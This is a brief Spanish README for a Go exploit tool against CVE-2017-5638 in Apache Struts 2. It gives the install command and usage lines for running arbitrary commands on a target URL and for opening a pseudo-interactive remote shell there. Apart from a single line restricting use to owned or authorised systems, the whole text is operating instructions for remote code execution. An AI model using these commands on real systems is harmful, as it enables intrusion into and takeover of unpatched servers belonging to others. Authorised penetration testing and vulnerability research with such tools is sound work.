
Exploit de Golang para CVE-2017-5638
Utilice este exploit únicamente en sistemas de su propiedad o sobre los que tenga permisos explícitos para realizar pruebas
Si ya tiene go instalado en su computadora, go get es la forma de hacerlo
go get github.com/Greynad/struts2-jakarta-inject
Ejecución de un solo comando
struts2-jakarta-inject -u <url> -c 'id'
Shell pseudointeractivo
struts2-jakarta-inject -u <url> -i